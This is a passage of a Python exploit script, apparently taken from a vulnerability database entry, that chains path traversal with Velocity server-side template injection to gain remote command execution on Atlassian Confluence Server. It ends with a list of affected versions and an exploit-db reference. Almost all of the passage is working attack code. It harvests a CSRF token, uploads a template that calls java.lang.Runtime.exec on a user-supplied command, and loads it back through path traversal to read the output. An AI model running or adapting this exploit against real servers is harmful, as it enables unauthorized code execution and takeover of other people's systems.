personal space, creating it now...") response = requests.post( self._create_personal_space_url, headers={ "Content-Type": "application/json" }, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, json={ "spaceUserKey": "" } ) if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to create personal space") log.debug(f"personal space created") response_data = response.json() self._space_key = response_data.get("key") else: log.info("sending request to find personal space key") response = requests.get( self._personal_space_key_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") personal_space_link_element = soup.find("a", id="view-personal-space-link") if not personal_space_link_element or not personal_space_link_element.has_attr("href"): exit_log(log, "failed to find personal space link in the response, does the user have personal space?") path = personal_space_link_element["href"] p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) r = p.match(path) if r: self._space_key = r.group(1) else: exit_log(log, "failed to find personal space key") log.debug(f"personal space key: {self._space_key}") self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \ f"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}" log.debug(f"generated personal space id url: {self._personal_space_id_url}") def find_personal_space_id_and_homepage_id(self): """ Makes request that will return personal space ID and homepage ID in the response. """ if self._personal_space_id_url is None: exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?") log.info("sending request to find personal space ID and homepage") response = requests.get( self._personal_space_id_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is JSON data = json.loads(page_content) if "results" not in data: exit_log(log, "failed to find 'result' section in json output") items = data["results"] if type(items) is not list or len(items) == 0: exit_log(log, "no results for personal space id") personal_space_data = items[0] if "id" not in personal_space_data: exit_log(log, "failed to find ID in personal space data") self._space_id = str(personal_space_data["id"]) log.debug(f"found space id: {self._space_id}") if "_expandable" not in personal_space_data: exit_log(log, "failed to find '_expandable' section in personal space data") personal_space_expandable_data = personal_space_data["_expandable"] if "homepage" not in personal_space_expandable_data: exit_log(log, "failed to find homepage in personal space expandable data") homepage_path = personal_space_expandable_data["homepage"] p = re.compile(Exploit.HOMEPAGE_REGEX) r = p.match(homepage_path) if r: self._homepage_id = r.group(1) log.debug(f"found homepage id: {self._homepage_id}") self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}" log.debug(f"generated atl token url: {self._atl_token_url}") self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}" log.debug(f"generated upload url: {self._upload_url}") else: exit_log(log, "failed to find homepage id, homepage path has incorrect format") def get_csrf_token(self): """ Makes request to get the current CSRF token for the session. """ if self._atl_token_url is None: exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?") log.info("sending request to find CSRF token") response = requests.get( self._atl_token_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, allow_redirects=False ) # check if response was proper... if not response.status_code == 200: log.debug(f"response code: {response.status_code}") exit_log(log, "failed to get personal space key") page_content = response.content # response is HTML soup = BeautifulSoup(page_content, features="html.parser") atl_token_element = soup.find("input", {"name": "atl_token"}) if not atl_token_element.has_attr("value"): exit_log(log, "failed to find value for atl_token") self._atl_token = atl_token_element["value"] log.debug(f"found CSRF token: {self._atl_token}") def upload_template(self): """ Makes multipart request to upload the template file to the server. """ log.info("uploading template to server") if not self._atl_token: exit_log(log, "cannot upload a file without CSRF token") if self._upload_url is None: exit_log(log, f"upload url is missing, did you call exploit functions in correct order?") # Velocity template here executes command and then captures the output. Here the output is generated by printing # character codes one by one in each line. This can be improved for sure but did not have time to investigate # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern # webapp' was not working properly. This gets decoded on our python client later. template = f"""#set( $test = "test" ) #set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}")) #set($exout = $ex.waitFor()) #set($out = $ex.getInputStream()) #foreach($i in [1..$out.available()]) #set($ch = $out.read()) $ch #end""" log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}") parts = { "atl_token": (None, self._atl_token), "file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), "confirm": "Attach" } response = requests.post( self._upload_url, cookies=self._config.session_cookie, proxies=self._config.proxies, verify=False, files=parts ) # for successful upload first a 302 response needs to happen then 200 page is returned with file ID if response.status_code == 403: exit_log(log, "got 403, probably problem with CSRF token") if not len(response.history) == 1 or not response.history[0].status_code == 302: exit_log(log, "failed to upload the payload") page_content = response.content if "Upload Failed" in str(page_content): exit_log(log, "failed to upload template") # response is HTML soup = BeautifulSoup(page_content, features="html.parser") file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME}) if not file_link_element.has_attr("data-linked-resource-id"): exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link") self._file_id = file_link_element["data-linked-resource-id"] log.debug(f"found file ID: {self._file_id}") def exploit_path_traversal(config): """ This sends one request towards vulnerable server to either get local file content or directory listing. """ log.debug("running path traversal exploit") exploit = Exploit(config) exploit.path_traversal(config.remote_path) def exploit_rce(config): """This executes multiple steps to gain RCE. Requires a session token. Steps: 1. find personal space key for the user 2. find personal space ID and homepage ID for the user 3. get CSRF token (generated per session) 4. upload template file with Java code (involves two requests, first one is 302 redirection) 5. use path traversal part of exploit to load and execute local template file 6. profit """ log.debug("running RCE exploit") exploit = Exploit(config) exploit.find_personal_space_key() exploit.find_personal_space_id_and_homepage_id() exploit.get_csrf_token() exploit.upload_template() payload_location = exploit.generate_payload_location() exploit.path_traversal(payload_location, decode_output=True) if __name__ == "__main__": # parse arguments and load all configuration items script_arguments = parse_arguments() log = Configuration.get_logger(script_arguments.verbosity) configuration = Configuration(script_arguments) # printing banner if not configuration.script_arguments.skip_banner: print_banner() if script_arguments.quiet: log.disabled = True log.debug("finished parsing CLI arguments") log.debug("configuration was loaded successfully") log.debug("starting exploit") # disabling warning about trusting self sign certificate from python requests urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # run appropriate function depending on mode configuration.script_arguments.func(configuration) log.debug("done!")

Products Mentioned

Configuraton 0

Atlassian>>Confluence_server >> Version To (excluding) 6.6.12

Atlassian>>Confluence_server >> Version From (including) 6.7.0 To (excluding) 6.12.3

Atlassian>>Confluence_server >> Version From (including) 6.13.0 To (excluding) 6.13.3

Atlassian>>Confluence_server >> Version From (including) 6.14.0 To (excluding) 6.14.2

References

https://www.exploit-db.com/exploits/46731/
Tags : exploit, x_refsource_EXPLOIT-DB